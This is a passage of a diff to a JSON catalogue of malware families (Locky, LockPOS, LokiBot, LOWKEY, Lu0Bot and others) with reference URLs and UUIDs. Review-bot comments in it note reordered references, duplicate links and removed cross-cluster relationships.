+ "https://news.sophos.com/en-us/2021/08/27/lockfile-ransomwares-box-of-tricks-intermittent-encryption-and-evasion/"
],
"synonyms": [],
"type": []
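Review bot: this LockFile hunk has no net effect on the `refs` set: each of the eight removed URLs (the microsoft, symantec, two sophos, bleepingcomputer, avast, nsfocus and thehackernews entries) is re-added further down in the same array. Pure reordering hunks are noise for anyone auditing what actually changed in the data; consider sorting `refs` before serializing, or keeping upstream order stable between runs.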
@@ -29844,29 +31530,29 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.locky",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/",
- "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html",
- "https://threatpost.com/ransomware-gang-arrested-locky-hospitals/155842/",
- "https://intel471.com/blog/a-brief-history-of-ta505",
"https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/",
- "https://vixra.org/pdf/2002.0183v1.pdf",
"https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/",
- "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html",
- "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://dissectingmalwa.re/picking-locky.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
"http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/",
+ "https://threatpost.com/ransomware-gang-arrested-locky-hospitals/155842/",
+ "https://vixra.org/pdf/2002.0183v1.pdf",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html",
+ "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/",
+ "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html",
+ "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf",
+ "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
"https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/",
- "https://thisissecurity.stormshield.com/2018/03/20/de-obfuscating-jump-chains-with-binary-ninja/",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://thisissecurity.stormshield.com/2018/03/20/de-obfuscating-jump-chains-with-binary-ninja/",
"http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html",
- "https://dissectingmalwa.re/picking-locky.html"
+ "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/"
],
"synonyms": [],
"type": []
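Review bot: the Locky hunk is again a pure reorder (all sixteen removed URLs come back as `+` lines), but it surfaces two pre-existing duplicate pairs worth deduplicating while the array is being touched: `https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/` and the same post under `securingtomorrow.mcafee.com`, and `https://intel471.com/blog/a-brief-history-of-ta505` next to `https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/`. Keeping one canonical URL per article avoids double counting in any consumer that tallies references per cluster.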
@@ -29904,21 +31590,12 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos",
"https://www.cyberbit.com/new-lockpos-malware-injection-technique/",
- "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html",
- "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/"
+ "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/",
+ "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "c740c46b-1d95-42b5-ac3d-2bbab071b859",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d2c111bf-ba0d-498a-8ca8-4cc508855872",
"value": "LockPOS"
},
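Review bot: the deletion of the whole `related` block for LockPOS (the `similar` relationship to `dest-uuid` `c740c46b-1d95-42b5-ac3d-2bbab071b859`) is the one change here that affects consumers, and nothing in the hunk explains it. If the target cluster was removed, or the link is now expressed from the other side, the commit message should say so; if the exporter simply stopped emitting `related`, this silently drops a cross-cluster link and should be treated as a regression. The two-line swap of the arbornetworks and cylance refs above it is a no-op.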
@@ -29927,14 +31604,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.loda",
- "https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html",
- "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/",
- "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware",
- "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
"https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html",
+ "https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html",
"https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html",
"https://www.silentpush.com/blog/more-lodarat-infrastructure-targeting-bangladesh-uncovered",
- "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA"
+ "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
+ "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA",
+ "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware",
+ "https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/",
+ "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/",
+ "https://ti.qianxin.com/blog/articles/Kasablanka-Group-Probably-Conducted-Compaigns-Targeting-Russia/"
],
"synonyms": [
"LodaRAT",
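Review bot: two genuinely new refs are buried in this Loda reorder, `https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/` and `https://ti.qianxin.com/blog/articles/Kasablanka-Group-Probably-Conducted-Compaigns-Targeting-Russia/`; the five `-` lines all reappear as `+` lines. Stable ordering would let the hunk read as the two-line addition it actually is.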
@@ -29950,14 +31629,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lodeinfo",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
"https://blogs.jpcert.or.jp/en/2021/02/LODEINFO-3.html",
- "https://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf",
- "https://www.cyberandramen.net/2020/06/analysis-of-lodeinfo-maldoc.html",
+ "https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-ii/107745/",
"https://www.macnica.net/pdf/mpressioncss_ta_report_2019_4_en.pdf",
+ "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/",
+ "https://www.cyberandramen.net/2020/06/analysis-of-lodeinfo-maldoc.html",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf",
+ "https://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html",
+ "https://blogs.jpcert.or.jp/ja/2020/06/LODEINFO-2.html",
"https://twitter.com/jpcert_ac/status/1351355443730255872",
- "https://blogs.jpcert.or.jp/ja/2020/06/LODEINFO-2.html"
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://blogs.jpcert.or.jp/en/2020/02/malware-lodeinfo-targeting-japan.html",
+ "https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/"
],
"synonyms": [],
"type": []
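Review bot: LODEINFO gains four real references here (the two securelist `apt10-tracking-down-lodeinfo-2022` parts, the welivesecurity MirrorFace write-up and the JPCERT English `malware-lodeinfo-targeting-japan` post), while the five removed URLs are all re-added at other positions. This is worth calling out in the changelog, since most hunks in this file are reorders with no new sources.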
@@ -29983,8 +31666,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos",
- "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-11-16-logpos-new-point-of-sale-malware-using-mailslots.md",
- "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html"
+ "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html",
+ "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-11-16-logpos-new-point-of-sale-malware-using-mailslots.md"
],
"synonyms": [],
"type": []
@@ -29997,8 +31680,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.logtu",
- "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/",
"https://news.drweb.ru/show/?i=14177",
+ "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/",
"https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf"
],
"synonyms": [],
@@ -30012,25 +31695,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lojax",
- "https://www.youtube.com/watch?v=VeoXT0nEcFU",
- "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/",
- "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
"https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://habr.com/ru/amp/post/668154/"
+ "https://habr.com/ru/amp/post/668154/",
+ "https://www.youtube.com/watch?v=VeoXT0nEcFU",
+ "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
+ "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "6d53a74e-c8a5-11e8-a123-332e4eaac9bb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "15228ae0-26f9-44d8-8d6e-87b0bd2d2aba",
"value": "LoJax"
},
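Review bot: the removal of the whole `related` block (the `similar` link to `dest-uuid` `6d53a74e-c8a5-11e8-a123-332e4eaac9bb`) drops a cross-reference from LoJax to another cluster, which is a semantic change rather than a refs refresh; if the intent is only to update references, keep the `related` array, and if the link is being retired on purpose, say so in the commit message so downstream galaxy consumers are not surprised by the vanished relationship. The rest of the hunk (moving the youtube, symantec and welivesecurity URLs to the end of `refs`) is pure reordering.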
@@ -30054,58 +31728,61 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws",
- "http://reversing.fun/reversing/2021/06/08/lokibot.html",
"https://github.com/R3MRUM/loki-parse",
- "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
- "https://isc.sans.edu/diary/27282",
- "http://www.malware-traffic-analysis.net/2017/06/12/index.html",
- "https://www.virusbulletin.com/virusbulletin/2020/02/lokibot-dissecting-cc-panel-deployments/",
- "https://phishme.com/loki-bot-malware/",
- "http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html",
- "https://www.lastline.com/blog/password-stealing-malware-loki-bot/",
- "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
- "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/",
- "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://www.atomicmatryoshka.com/post/malware-headliners-lokibot",
- "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/",
- "https://news.sophos.com/en-us/2020/05/14/raticate/",
- "https://www.youtube.com/watch?v=-FxyzuRv6Wg",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
- "https://cybergeeks.tech/how-to-expose-a-potential-cybercriminal-due-to-misconfigurations",
- "https://www.youtube.com/watch?v=N0wAh26wShE",
- "https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html",
- "http://reversing.fun/posts/2021/06/08/lokibot.html",
- "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
- "https://www.lac.co.jp/lacwatch/report/20220307_002893.html",
- "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850",
- "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://www.infoblox.com/wp-content/uploads/infoblox-whitepaper-deep-analysis-of-a-recent-lokibot-attack.pdf",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html",
- "https://isc.sans.edu/diary/24372",
- "https://www.youtube.com/watch?v=K3Yxu_9OUxU",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/spammed-png-file-hides-lokibot/",
- "https://medium.com/@paul.k.burbage/the-tale-of-the-pija-droid-firefinch-4d304fde5ca2",
- "https://lab52.io/blog/a-twisted-malware-infection-chain/",
- "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf",
- "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
- "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/",
- "https://malcat.fr/blog/reversing-a-nsis-dropper-using-quick-and-dirty-shellcode-emulation/",
- "https://marcoramilli.com/2019/10/28/sweed-targeting-precision-engineering-companies-in-italy/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam-part-2/",
"https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file",
- "https://clickallthethings.wordpress.com/2020/03/31/lokibot-getting-equation-editor-shellcode/",
- "https://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/loki-info-stealer-propagates-through-lzh-files",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://malcat.fr/blog/statically-unpacking-a-simple-net-dropper/",
+ "https://lab52.io/blog/a-twisted-malware-infection-chain/",
+ "https://www.atomicmatryoshka.com/post/malware-headliners-lokibot",
+ "http://reversing.fun/reversing/2021/06/08/lokibot.html",
"https://cybergeeks.tech/how-to-expose-a-potential-cybercriminal-due-to-misconfigurations/",
- "https://ivanvza.github.io/posts/lokibot_analysis"
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://www.youtube.com/watch?v=-FxyzuRv6Wg",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
+ "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/",
+ "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
+ "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html",
+ "https://malcat.fr/blog/statically-unpacking-a-simple-net-dropper/",
+ "http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html",
+ "https://www.youtube.com/watch?v=N0wAh26wShE",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.youtube.com/watch?v=K3Yxu_9OUxU",
+ "https://malcat.fr/blog/reversing-a-nsis-dropper-using-quick-and-dirty-shellcode-emulation/",
+ "https://ivanvza.github.io/posts/lokibot_analysis",
+ "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://www.virusbulletin.com/virusbulletin/2020/02/lokibot-dissecting-cc-panel-deployments/",
+ "https://www.lastline.com/blog/password-stealing-malware-loki-bot/",
+ "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://medium.com/@paul.k.burbage/the-tale-of-the-pija-droid-firefinch-4d304fde5ca2",
+ "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850",
+ "https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html",
+ "https://marcoramilli.com/2019/10/28/sweed-targeting-precision-engineering-companies-in-italy/",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
+ "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam-part-2/",
+ "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
+ "https://www.infoblox.com/wp-content/uploads/infoblox-whitepaper-deep-analysis-of-a-recent-lokibot-attack.pdf",
+ "https://www.lac.co.jp/lacwatch/report/20220307_002893.html",
+ "https://clickallthethings.wordpress.com/2020/03/31/lokibot-getting-equation-editor-shellcode/",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "http://reversing.fun/posts/2021/06/08/lokibot.html",
+ "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html",
+ "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/spammed-png-file-hides-lokibot/",
+ "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/",
+ "https://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html",
+ "https://phishme.com/loki-bot-malware/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/loki-info-stealer-propagates-through-lzh-files",
+ "http://www.malware-traffic-analysis.net/2017/06/12/index.html",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/",
+ "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/",
+ "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf",
+ "https://cybergeeks.tech/how-to-expose-a-potential-cybercriminal-due-to-misconfigurations",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://isc.sans.edu/diary/27282",
+ "https://isc.sans.edu/diary/24372"
],
"synonyms": [
"Burkina",
@@ -30136,11 +31813,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lolsnif",
- "https://medium.com/@vishal_thakur/lolsnif-malware-e6cb2e731e63",
"https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/",
"https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
+ "https://www.telekom.com/en/blog/group/article/lolsnif-tracking-another-ursnif-based-targeted-campaign-600062",
"https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/",
- "https://www.telekom.com/en/blog/group/article/lolsnif-tracking-another-ursnif-based-targeted-campaign-600062"
+ "https://medium.com/@vishal_thakur/lolsnif-malware-e6cb2e731e63"
],
"synonyms": [],
"type": []
@@ -30167,10 +31844,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.loochiper",
- "https://blog.yoroi.company/research/loocipher-the-new-infernal-ransomware/",
"https://github.com/ZLab-Cybaze-Yoroi/LooCipher_Decryption_Tool",
- "https://www.fortinet.com/blog/threat-research/loocipher-can-encrypted-files-be-recovered.html",
- "https://marcoramilli.com/2019/07/13/free-tool-loocipher-decryptor/"
+ "https://blog.yoroi.company/research/loocipher-the-new-infernal-ransomware/",
+ "https://marcoramilli.com/2019/07/13/free-tool-loocipher-decryptor/",
+ "https://www.fortinet.com/blog/threat-research/loocipher-can-encrypted-files-be-recovered.html"
],
"synonyms": [],
"type": []
@@ -30183,15 +31860,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lookback",
- "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/",
- "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new",
- "https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/",
"https://threatgen.com/taking-a-closer-look-at-the-lookback-malware-campaign-part-1/",
- "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
- "https://nao-sec.org/2021/01/royal-road-redive.html",
"https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks",
+ "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
+ "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/",
+ "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
+ "https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/",
+ "https://nao-sec.org/2021/01/royal-road-redive.html",
+ "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new",
"https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals",
- "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf"
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage"
],
"synonyms": [],
"type": []
@@ -30204,11 +31882,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lordix",
- "https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/decrypt_l0rdix_c2.py",
- "https://twitter.com/hexlax/status/1058356670835908610",
- "https://www.bromium.com/decrypting-l0rdix-rats-c2/",
"https://www.bromium.com/an-analysis-of-l0rdix-rat-panel-and-builder/",
- "https://blog.ensilo.com/l0rdix-attack-tool"
+ "https://www.bromium.com/decrypting-l0rdix-rats-c2/",
+ "https://blog.ensilo.com/l0rdix-attack-tool",
+ "https://twitter.com/hexlax/status/1058356670835908610",
+ "https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/decrypt_l0rdix_c2.py"
],
"synonyms": [
"lordix"
@@ -30223,13 +31901,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lorenz",
- "https://therecord.media/free-decrypter-available-for-lorenz-ransomware/",
- "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
- "https://twitter.com/AltShiftPrtScn/status/1423190900516302860?s=20",
- "https://www.tesorion.nl/en/posts/lorenz-ransomware-analysis-and-a-free-decryptor/",
+ "https://arcticwolf.com/resources/blog/lorenz-ransomware-getting-dumped/",
"https://www.bleepingcomputer.com/news/security/meet-lorenz-a-new-ransomware-gang-targeting-the-enterprise/",
+ "https://twitter.com/AltShiftPrtScn/status/1423190900516302860?s=20",
"https://www.tesorion.nl/en/posts/lorenz-ransomware-rebound-corruption-and-irrecoverable-files/",
- "https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware"
+ "https://www.tesorion.nl/en/posts/lorenz-ransomware-analysis-and-a-free-decryptor/",
+ "https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware",
+ "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
+ "https://therecord.media/free-decrypter-available-for-lorenz-ransomware/"
],
"synonyms": [],
"type": []
@@ -30242,8 +31921,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.loup",
- "https://twitter.com/r3c0nst/status/1295275546780327936",
- "https://twitter.com/Arkbird_SOLG/status/1295396936896438272"
+ "https://twitter.com/Arkbird_SOLG/status/1295396936896438272",
+ "https://twitter.com/r3c0nst/status/1295275546780327936"
],
"synonyms": [],
"type": []
@@ -30256,9 +31935,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball",
- "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html",
+ "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
"https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
- "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/"
+ "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html"
],
"synonyms": [],
"type": []
@@ -30271,10 +31950,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lowkey",
- "https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html",
"https://www.mandiant.com/resources/apt41-us-state-governments",
"https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf",
- "https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/"
+ "https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/",
+ "https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html"
],
"synonyms": [
"PortReuse"
@@ -30284,13 +31963,27 @@
"uuid": "515d1318-c3b1-4d40-a321-31b3baf75414",
"value": "LOWKEY"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowzero",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0922.pdf",
+ "https://malgamy.github.io/malware-analysis/The-Approach-of-TA413-for-Tibetan-Targets/#third-stage"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1efd4902-ff9e-4e71-8867-6eddb9bc456c",
+ "value": "LOWZERO"
+ },
{
"description": "This in Go written malware is lsass process memory dumper, which was custom developed by threat actors according to Security Joes. It has the capability to automatically exfiltrate the results to the free file transfer service \"transfer.sh\".",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lsassdumper",
- "https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/",
- "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf"
+ "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf",
+ "https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/"
],
"synonyms": [],
"type": []
@@ -30299,7 +31992,20 @@
"value": "lsassDumper"
},
{
- "description": "A stealer written in Rust.",
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lu0bot",
+ "https://bazaar.abuse.ch/browse/tag/Lu0Bot/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d81c068d-7420-40ee-ab50-5f29b2ccc314",
+ "value": "Lu0Bot"
+ },
+ {
